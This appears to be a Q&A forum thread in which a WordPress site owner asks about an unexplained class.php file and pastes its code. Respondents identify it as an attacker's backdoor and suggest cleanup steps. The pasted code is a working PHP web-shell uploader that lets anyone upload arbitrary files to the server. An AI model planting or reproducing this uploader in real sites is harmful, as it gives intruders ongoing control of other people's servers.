# What is this file? Class.php in wordpress

Tags: wordpress

A file named class.php appeared in my wordpress folder and wp-includes/pomo folder.

What is this file? I didn't edit my side for last 3 days.

Code

```
    <?php
echo '<b>Jundab<br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }
    else { echo '<b>Upload Fail !!!</b><br><br>'; }
}
?>
```

Please help.

Comment: Looks like somebody is preparing an intrusion. They already succeeded in creating an “endpoint” to upload malicious scripts. You should ASAP update your WordPress and all plugins, check permissions, remove unneccessary plugins and reset all user passwords. And of course delete that script immediately. Additional measures may be neccessary to make sure you've cleaned everything properly.

Comment: I agree, this is exactly what it looks like.

Comment: Thank you. I removed it.

But how did one gain access to my server? I have completely locked it and my folder permission was set to 705.
Thanks!

Answer (score 1):

Looks like someone built himself a backdoor. Very likely this was installed by an automated crawler looking for vulnerable installs. are you running an old wordpress version?